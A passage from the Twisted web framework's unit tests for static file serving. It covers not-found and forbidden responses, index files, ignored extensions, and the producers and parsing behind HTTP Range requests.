Passing C{1} as the value to L{File}'s C{allowExt} argument
issues a warning and sets the ignored extensions to the
wildcard C{*}.
"""
with warnings.catch_warnings(record=True) as caughtWarnings:
file = static.File(self.mktemp(), ignoredExts=True)
self.assertEqual(file.ignoredExts, ["*"])
self.assertEqual(len(caughtWarnings), 1)
def test_invalidMethod(self):
"""
L{File.render} raises L{UnsupportedMethod} in response to a non-I{GET},
non-I{HEAD} request.
"""
request = DummyRequest([b''])
request.method = b'POST'
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
self.assertRaises(UnsupportedMethod, file.render, request)
def test_notFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which does not correspond to any file in the path the L{File} was
created with, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'foobar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
def test_emptyChild(self):
"""
The C{''} child of a L{File} which corresponds to a directory in the
filesystem is a L{DirectoryLister}.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
self.assertIsInstance(child, static.DirectoryLister)
self.assertEqual(child.path, base.path)
def test_emptyChildUnicodeParent(self):
"""
The C{u''} child of a L{File} which corresponds to a directory
whose path is text is a L{DirectoryLister} that renders to a
binary listing.
@see: U{https://twistedmatrix.com/trac/ticket/9438}
"""
textBase = FilePath(self.mktemp()).asTextMode()
textBase.makedirs()
textBase.child(u"text-file").open('w').close()
textFile = static.File(textBase.path)
request = DummyRequest([b''])
child = resource.getChildForRequest(textFile, request)
self.assertIsInstance(child, static.DirectoryLister)
nativePath = compat.nativeString(textBase.path)
self.assertEqual(child.path, nativePath)
response = child.render(request)
self.assertIsInstance(response, bytes)
def test_securityViolationNotFound(self):
"""
If a request is made which encounters a L{File} before a final segment
which cannot be looked up in the filesystem due to security
considerations, a not found response is sent.
"""
base = FilePath(self.mktemp())
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b'..'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
d.addCallback(cbRendered)
return d
@skipIf(platform.isWindows(), "Cannot remove read permission on Windows")
def test_forbiddenResource(self):
"""
If the file in the filesystem which would satisfy a request cannot be
read, L{File.render} sets the HTTP response code to I{FORBIDDEN}.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
# Make sure we can delete the file later.
self.addCleanup(base.chmod, 0o700)
# Get rid of our own read permission.
base.chmod(0)
file = static.File(base.path)
request = DummyRequest([b''])
d = self._render(file, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 403)
d.addCallback(cbRendered)
return d
def test_undecodablePath(self):
"""
A request whose path cannot be decoded as UTF-8 receives a not
found response, and the failure is logged.
"""
path = self.mktemp()
if isinstance(path, bytes):
path = path.decode('ascii')
base = FilePath(path)
base.makedirs()
file = static.File(base.path)
request = DummyRequest([b"\xff"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(request.responseCode, 404)
self.assertEqual(len(self.flushLoggedErrors(UnicodeDecodeError)),
1)
d.addCallback(cbRendered)
return d
def test_forbiddenResource_default(self):
"""
L{File.forbidden} defaults to L{resource.ForbiddenResource}.
"""
self.assertIsInstance(
static.File(b'.').forbidden, resource.ForbiddenResource)
def test_forbiddenResource_customize(self):
"""
The resource rendered for forbidden requests is stored as a class
member so that users can customize it.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-forbidden-response'
def failingOpenForReading():
raise IOError(errno.EACCES, "")
class CustomForbiddenResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
forbidden = CustomForbiddenResource()
fileResource = CustomStaticFile(base.path)
fileResource.openForReading = failingOpenForReading
request = DummyRequest([b''])
result = fileResource.render(request)
self.assertEqual(markerResponse, result)
def test_indexNames(self):
"""
If a request is made which encounters a L{File} before a final empty
segment, a file in the L{File} instance's C{indexNames} list which
exists in the path the L{File} was created with is served as the
response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
file.indexNames = ['foo.bar']
request = DummyRequest([b''])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
def test_staticFile(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file in the path the L{File} was created with, that file
is served as the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(b"baz")
file = static.File(base.path)
request = DummyRequest([b'foo.bar'])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'3')
d.addCallback(cbRendered)
return d
@skipIf(sys.getfilesystemencoding().lower() not in ('utf-8', 'mcbs'),
"Cannot write unicode filenames with file system encoding of"
" {}".format(sys.getfilesystemencoding()))
def test_staticFileUnicodeFileName(self):
"""
A request for a existing unicode file path encoded as UTF-8
returns the contents of that file.
"""
name = u"\N{GREEK SMALL LETTER ETA WITH PERISPOMENI}"
content = b"content"
base = FilePath(self.mktemp())
base.makedirs()
base.child(name).setContent(content)
file = static.File(base.path)
request = DummyRequest([name.encode('utf-8')])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), content)
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
networkString(str(len(content))))
d.addCallback(cbRendered)
return d
def test_staticFileDeletedGetChild(self):
"""
A L{static.File} created for a directory which does not exist should
return childNotFound from L{static.File.getChild}.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
child = staticFile.getChild(b"foo.bar", request)
self.assertEqual(child, staticFile.childNotFound)
def test_staticFileDeletedRender(self):
"""
A L{static.File} created for a file which does not exist should render
its C{childNotFound} page.
"""
staticFile = static.File(self.mktemp())
request = DummyRequest([b'foo.bar'])
request2 = DummyRequest([b'foo.bar'])
d = self._render(staticFile, request)
d2 = self._render(staticFile.childNotFound, request2)
def cbRendered2(ignored):
def cbRendered(ignored):
self.assertEqual(b''.join(request.written),
b''.join(request2.written))
d.addCallback(cbRendered)
return d
d2.addCallback(cbRendered2)
return d2
def test_getChildChildNotFound_customize(self):
"""
The resource rendered for child not found requests can be customize
using a class member.
"""
base = FilePath(self.mktemp())
base.setContent(b'')
markerResponse = b'custom-child-not-found-response'
class CustomChildNotFoundResource(resource.Resource):
def render(self, request):
return markerResponse
class CustomStaticFile(static.File):
childNotFound = CustomChildNotFoundResource()
fileResource = CustomStaticFile(base.path)
request = DummyRequest([b'no-child.txt'])
child = fileResource.getChild(b'no-child.txt', request)
result = child.render(request)
self.assertEqual(markerResponse, result)
def test_headRequest(self):
"""
L{static.File.render} returns an empty response body for I{HEAD}
requests.
"""
path = FilePath(self.mktemp())
path.setContent(b"foo")
file = static.File(path.path)
request = DummyRequest([b''])
request.method = b'HEAD'
d = _render(file, request)
def cbRendered(ignored):
self.assertEqual(b"".join(request.written), b"")
d.addCallback(cbRendered)
return d
def test_processors(self):
"""
If a request is made which encounters a L{File} before a final segment
which names a file with an extension which is in the L{File}'s
C{processors} mapping, the processor associated with that extension is
used to serve the response to the request.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child("foo.bar").setContent(
b"from twisted.web.static import Data\n"
b"resource = Data(b'dynamic world', 'text/plain')\n")
file = static.File(base.path)
file.processors = {'.bar': script.ResourceScript}
request = DummyRequest([b"foo.bar"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'dynamic world')
self.assertEqual(
request.responseHeaders.getRawHeaders(b'content-length')[0],
b'13')
d.addCallback(cbRendered)
return d
def test_ignoreExt(self):
"""
The list of ignored extensions can be set by passing a value to
L{File.__init__} or by calling L{File.ignoreExt} later.
"""
file = static.File(b".")
self.assertEqual(file.ignoredExts, [])
file.ignoreExt(".foo")
file.ignoreExt(".bar")
self.assertEqual(file.ignoredExts, [".foo", ".bar"])
file = static.File(b".", ignoredExts=(".bar", ".baz"))
self.assertEqual(file.ignoredExts, [".bar", ".baz"])
def test_ignoredExtensionsIgnored(self):
"""
A request for the I{base} child of a L{File} succeeds with a resource
for the I{base<extension>} file in the path the L{File} was created
with if such a file exists and the L{File} has been configured to
ignore the I{<extension>} extension.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('foo.bar').setContent(b'baz')
base.child('foo.quux').setContent(b'foobar')
file = static.File(base.path, ignoredExts=(".bar",))
request = DummyRequest([b"foo"])
child = resource.getChildForRequest(file, request)
d = self._render(child, request)
def cbRendered(ignored):
self.assertEqual(b''.join(request.written), b'baz')
d.addCallback(cbRendered)
return d
def test_directoryWithoutTrailingSlashRedirects(self):
"""
A request for a path which is a directory but does not have a trailing
slash will be redirected to a URL which does have a slash by L{File}.
"""
base = FilePath(self.mktemp())
base.makedirs()
base.child('folder').makedirs()
file = static.File(base.path)
request = DummyRequest([b"folder"])
request.uri = b"http://dummy/folder#baz?foo=bar"
child = resource.getChildForRequest(file, request)
self.successResultOf(self._render(child, request))
self.assertEqual(request.responseCode, FOUND)
self.assertEqual(request.responseHeaders.getRawHeaders(b"location"),
[b"http://dummy/folder/#baz?foo=bar"])
def _makeFilePathWithStringIO(self):
"""
Create a L{File} that when opened for reading, returns a L{StringIO}.
@return: 2-tuple of the opened "file" and the L{File}.
@rtype: L{tuple}
"""
fakeFile = StringIO()
path = FilePath(self.mktemp())
path.touch()
file = static.File(path.path)
# Open our file instead of a real one
file.open = lambda: fakeFile
return fakeFile, file
def test_HEADClosesFile(self):
"""
A HEAD request opens the file, gets the size, and then closes it after
the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'HEAD'
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
def test_cachedRequestClosesFile(self):
"""
A GET request that is cached closes the file after the request.
"""
fakeFile, file = self._makeFilePathWithStringIO()
request = DummyRequest([''])
request.method = b'GET'
# This request will always return saying that it is cached
request.setLastModified = lambda _: http.CACHED
self.successResultOf(_render(file, request))
self.assertEqual(b''.join(request.written), b'')
self.assertTrue(fakeFile.closed)
class StaticMakeProducerTests(TestCase):
"""
Tests for L{File.makeProducer}.
"""
def makeResourceWithContent(self, content, type=None, encoding=None):
"""
Make a L{static.File} resource that has C{content} for its content.
@param content: The L{bytes} to use as the contents of the resource.
@param type: Optional value for the content type of the resource.
"""
fileName = FilePath(self.mktemp())
fileName.setContent(content)
resource = static.File(fileName._asBytesPath())
resource.encoding = encoding
resource.type = type
return resource
def contentHeaders(self, request):
"""
Extract the content-* headers from the L{DummyRequest} C{request}.
This returns the subset of C{request.outgoingHeaders} of headers that
start with 'content-'.
"""
contentHeaders = {}
for k, v in request.responseHeaders.getAllRawHeaders():
if k.lower().startswith(b'content-'):
contentHeaders[k.lower()] = v[0]
return contentHeaders
def test_noRangeHeaderGivesNoRangeStaticProducer(self):
"""
makeProducer when no Range header is set returns an instance of
NoRangeStaticProducer.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.NoRangeStaticProducer)
def test_noRangeHeaderSets200OK(self):
"""
makeProducer when no Range header is set sets the responseCode on the
request to 'OK'.
"""
resource = self.makeResourceWithContent(b'')
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(http.OK, request.responseCode)
def test_noRangeHeaderSetsContentHeaders(self):
"""
makeProducer when no Range header is set sets the Content-* headers
for the response.
"""
length = 123
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(
b'a'*length, type=contentType, encoding=contentEncoding)
request = DummyRequest([])
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-length': b'%d' % (length,),
b'content-encoding': networkString(contentEncoding)},
self.contentHeaders(request))
def test_singleRangeGivesSingleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of SingleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the response code on the request to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_singleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3')
contentType = "text/plain"
contentEncoding = 'gzip'
resource = self.makeResourceWithContent(b'abcdef', type=contentType, encoding=contentEncoding)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': networkString(contentType),
b'content-encoding': networkString(contentEncoding),
b'content-range': b'bytes 1-3/6', b'content-length': b'3'},
self.contentHeaders(request))
def test_singleUnsatisfiableRangeReturnsSingleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests a single unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.SingleRangeStaticProducer)
def test_singleUnsatisfiableRangeSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests a single
unsatisfiable byte range.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_singleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, unsatisfiable
byte range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'0',
b'content-range': b'bytes */3'},
self.contentHeaders(request))
def test_singlePartiallyOverlappingRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single byte range that
partly overlaps the resource sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=2-10')
contentType = "text/plain"
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-type': b'text/plain', b'content-length': b'1',
b'content-range': b'bytes 2-2/3'},
self.contentHeaders(request))
def test_multipleRangeGivesMultipleRangeStaticProducer(self):
"""
makeProducer when the Range header requests a single byte range
returns an instance of MultipleRangeStaticProducer.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleRangeSets206PartialContent(self):
"""
makeProducer when the Range header requests a multiple satisfiable
byte ranges sets the response code on the request to 'Partial
Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
def test_mutipleRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests a single, satisfiable byte
range sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,5-6')
resource = self.makeResourceWithContent(
b'abcdefghijkl', encoding='gzip')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
contentHeaders = self.contentHeaders(request)
# The only content-* headers set are content-type and content-length.
self.assertEqual(
set([b'content-length', b'content-type']),
set(contentHeaders.keys()))
# The content-length depends on the boundary used in the response.
expectedLength = 5
for boundary, offset, size in producer.rangeInfo:
expectedLength += len(boundary)
self.assertEqual(b'%d' % (expectedLength,),
contentHeaders[b'content-length'])
# Content-type should be set to a value indicating a multipart
# response and the boundary used to separate the parts.
self.assertIn(b'content-type', contentHeaders)
contentType = contentHeaders[b'content-type']
self.assertNotIdentical(
None, re.match(
b'multipart/byteranges; boundary="[^"]*"\Z', contentType))
# Content-encoding is not set in the response to a multiple range
# response, which is a bit wussy but works well enough with the way
# static.File does content-encodings...
self.assertNotIn(b'content-encoding', contentHeaders)
def test_multipleUnsatisfiableRangesReturnsMultipleRangeStaticProducer(self):
"""
makeProducer still returns an instance of L{SingleRangeStaticProducer}
when the Range header requests multiple ranges, none of which are
satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
producer = resource.makeProducer(request, file)
self.assertIsInstance(producer, static.MultipleRangeStaticProducer)
def test_multipleUnsatisfiableRangesSets416ReqestedRangeNotSatisfiable(self):
"""
makeProducer sets the response code of the request to of 'Requested
Range Not Satisfiable' when the Range header requests multiple ranges,
none of which are satisfiable.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.REQUESTED_RANGE_NOT_SATISFIABLE, request.responseCode)
def test_multipleUnsatisfiableRangeSetsContentHeaders(self):
"""
makeProducer when the Range header requests multiple ranges, none of
which are satisfiable, sets the Content-* headers appropriately.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=4-10')
contentType = "text/plain"
request.requestHeaders.addRawHeader(b'range', b'bytes=10-12,15-20')
resource = self.makeResourceWithContent(b'abc', type=contentType)
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
{b'content-length': b'0',
b'content-range': b'bytes */3',
b'content-type': b'text/plain'},
self.contentHeaders(request))
def test_oneSatisfiableRangeIsEnough(self):
"""
makeProducer when the Range header requests multiple ranges, at least
one of which matches, sets the response code to 'Partial Content'.
"""
request = DummyRequest([])
request.requestHeaders.addRawHeader(b'range', b'bytes=1-3,100-200')
resource = self.makeResourceWithContent(b'abcdef')
with resource.openForReading() as file:
resource.makeProducer(request, file)
self.assertEqual(
http.PARTIAL_CONTENT, request.responseCode)
class StaticProducerTests(TestCase):
"""
Tests for the abstract L{StaticProducer}.
"""
def test_stopProducingClosesFile(self):
"""
L{StaticProducer.stopProducing} closes the file object the producer is
producing data from.
"""
fileObject = StringIO()
producer = static.StaticProducer(None, fileObject)
producer.stopProducing()
self.assertTrue(fileObject.closed)
def test_stopProducingSetsRequestToNone(self):
"""
L{StaticProducer.stopProducing} sets the request instance variable to
None, which indicates to subclasses' resumeProducing methods that no
more data should be produced.
"""
fileObject = StringIO()
producer = static.StaticProducer(DummyRequest([]), fileObject)
producer.stopProducing()
self.assertIdentical(None, producer.request)
class NoRangeStaticProducerTests(TestCase):
"""
Tests for L{NoRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{NoRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.NoRangeStaticProducer(None, None))
def test_resumeProducingProducesContent(self):
"""
L{NoRangeStaticProducer.resumeProducing} writes content from the
resource to the request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual(content, b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{NoRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'a' * (2*bufferSize + 1)
producer = static.NoRangeStaticProducer(
request, StringIO(content))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
expected = [
content[0:bufferSize],
content[bufferSize:2*bufferSize],
content[2*bufferSize:]
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{NoRangeStaticProducer.resumeProducing} calls finish() on the request
after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.NoRangeStaticProducer(
request, StringIO(b'abcdef'))
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class SingleRangeStaticProducerTests(TestCase):
"""
Tests for L{SingleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{SingleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.SingleRangeStaticProducer(None, None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{SingleRangeStaticProducer.resumeProducing} writes the given amount
of content, starting at the given offset, from the resource to the
request.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, 3)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(content[1:4], b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{SingleRangeStaticProducer.start} writes at most
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
"""
request = DummyRequest([])
bufferSize = abstract.FileDescriptor.bufferSize
content = b'abc' * bufferSize
producer = static.SingleRangeStaticProducer(
request, StringIO(content), 1, bufferSize+10)
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
content[1:bufferSize+1],
content[bufferSize+1:bufferSize+11],
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{SingleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.SingleRangeStaticProducer(
request, StringIO(b'abcdef'), 1, 1)
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class MultipleRangeStaticProducerTests(TestCase):
"""
Tests for L{MultipleRangeStaticProducer}.
"""
def test_implementsIPullProducer(self):
"""
L{MultipleRangeStaticProducer} implements L{IPullProducer}.
"""
verifyObject(
interfaces.IPullProducer,
static.MultipleRangeStaticProducer(None, None, None))
def test_resumeProducingProducesContent(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} writes the requested
chunks of content from the resource to the request, with the supplied
boundaries in between each chunk.
"""
request = DummyRequest([])
content = b'abcdef'
producer = static.MultipleRangeStaticProducer(
request, StringIO(content), [(b'1', 1, 3), (b'2', 5, 1)])
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
self.assertEqual(b'1bcd2f', b''.join(request.written))
def test_resumeProducingBuffersOutput(self):
"""
L{MultipleRangeStaticProducer.start} writes about
C{abstract.FileDescriptor.bufferSize} bytes of content from the
resource to the request at once.
To be specific about the 'about' above: it can write slightly more,
for example in the case where the first boundary plus the first chunk
is less than C{bufferSize} but first boundary plus the first chunk
plus the second boundary is more, but this is unimportant as in
practice the boundaries are fairly small. On the other side, it is
important for performance to bundle up several small chunks into one
call to request.write.
"""
request = DummyRequest([])
content = b'0123456789' * 2
producer = static.MultipleRangeStaticProducer(
request, StringIO(content),
[(b'a', 0, 2), (b'b', 5, 10), (b'c', 0, 0)])
producer.bufferSize = 10
# DummyRequest.registerProducer pulls all output from the producer, so
# we just need to call start.
producer.start()
expected = [
b'a' + content[0:2] + b'b' + content[5:11],
content[11:15] + b'c',
]
self.assertEqual(expected, request.written)
def test_finishCalledWhenDone(self):
"""
L{MultipleRangeStaticProducer.resumeProducing} calls finish() on the
request after it is done producing content.
"""
request = DummyRequest([])
finishDeferred = request.notifyFinish()
callbackList = []
finishDeferred.addCallback(callbackList.append)
producer = static.MultipleRangeStaticProducer(
request, StringIO(b'abcdef'), [(b'', 1, 2)])
# start calls registerProducer on the DummyRequest, which pulls all
# output from the producer and so we just need this one call.
producer.start()
self.assertEqual([None], callbackList)
class RangeTests(TestCase):
"""
Tests for I{Range-Header} support in L{twisted.web.static.File}.
@type file: L{file}
@ivar file: Temporary (binary) file containing the content to be served.
@type resource: L{static.File}
@ivar resource: A leaf web resource using C{file} as content.
@type request: L{DummyRequest}
@ivar request: A fake request, requesting C{resource}.
@type catcher: L{list}
@ivar catcher: List which gathers all log information.
"""
def setUp(self):
"""
Create a temporary file with a fixed payload of 64 bytes. Create a
resource for that file and create a request which will be for that
resource. Each test can set a different range header to test different
aspects of the implementation.
"""
path = FilePath(self.mktemp())
# This is just a jumble of random stuff. It's supposed to be a good
# set of data for this test, particularly in order to avoid
# accidentally seeing the right result by having a byte sequence
# repeated at different locations or by having byte values which are
# somehow correlated with their position in the string.
self.payload = (b'\xf8u\xf3E\x8c7\xce\x00\x9e\xb6a0y0S\xf0\xef\xac\xb7'
b'\xbe\xb5\x17M\x1e\x136k{\x1e\xbe\x0c\x07\x07\t\xd0'
b'\xbckY\xf5I\x0b\xb8\x88oZ\x1d\x85b\x1a\xcdk\xf2\x1d'
b'&\xfd%\xdd\x82q/A\x10Y\x8b')
path.setContent(self.payload)
self.file = path.open()
self.resource = static.File(self.file.name)
self.resource.isLeaf = 1
self.request = DummyRequest([b''])
self.request.uri = self.file.name
self.catcher = []
log.addObserver(self.catcher.append)
def tearDown(self):
"""
Clean up the resource file and the log observer.
"""
self.file.close()
log.removeObserver(self.catcher.append)
def _assertLogged(self, expected):
"""
Asserts that a given log message occurred with an expected message.
"""
logItem = self.catcher.pop()
self.assertEqual(logItem["message"][0], expected)
self.assertEqual(
self.catcher, [], "An additional log occurred: %r" % (logItem,))
def test_invalidRanges(self):
"""
L{File._parseRangeHeader} raises L{ValueError} when passed
syntactically invalid byte ranges.
"""
f = self.resource._parseRangeHeader
# there's no =
self.assertRaises(ValueError, f, b'bytes')
# unknown isn't a valid Bytes-Unit
self.assertRaises(ValueError, f, b'unknown=1-2')
# there's no - in =stuff
self.assertRaises(ValueError, f, b'bytes=3')
# both start and end are empty
self.assertRaises(ValueError, f, b'bytes=-')
# start isn't an integer
self.assertRaises(ValueError, f, b'bytes=foo-')
# end isn't an integer
self.assertRaises(ValueError, f, b'bytes=-foo')
# end isn't equal to or greater than start
self.assertRaises(ValueError, f, b'bytes=5-4')
def test_rangeMissingStop(self):
"""
A single bytes range without an explicit stop position is parsed into a
two-tuple giving the start position and L{None}.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=0-'), [(0, None)])
def test_rangeMissingStart(self):
"""
A single bytes range without an explicit start position is parsed into
a two-tuple of L{None} and the end position.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=-3'), [(None, 3)])
def test_range(self):
"""
A single bytes range with explicit start and stop positions is parsed
into a two-tuple of those positions.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=2-5'), [(2, 5)])
def test_rangeWithSpace(self):
"""
A single bytes range with whitespace in allowed places is parsed in
the same way as it would be without the whitespace.
"""
self.assertEqual(
self.resource._parseRangeHeader(b' bytes=1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes =1-2 '), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes= 1-2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1 -2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1- 2'), [(1, 2)])
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2 '), [(1, 2)])
def test_nullRangeElements(self):
"""
If there are multiple byte ranges but only one is non-null, the
non-null range is parsed and its start and stop returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,\r\n, ,\t'), [(1, 2)])
def test_multipleRanges(self):
"""
If multiple byte ranges are specified their starts and stops are
returned.
"""
self.assertEqual(
self.resource._parseRangeHeader(b'bytes=1-2,3-4'),
[(1, 2), (3, 4)])
def test_bodyLength(self):
"""
A correct response to a range request is as long as the length of the
requested range.
"""
self.request.requestHeaders.addRawHeader(b'range', b'bytes=0-43')
self.resource.render(self.request)
self.assertEqual(len(b''.join(self.request.written)), 44)
def test_invalidRangeRequest(self):
"""
An incorrect range request (RFC 2616 defines a correct range request as
a Bytes-Unit followed by a '=' character followed by a specific range.
Only 'bytes' is defined) results in the range header value being logged
and a normal 200 response being sent.
"""
range = b'foobar=0-43'
self.request.requestHeaders.addRawHeader(b'range', range)
self.resource.render(self.request)
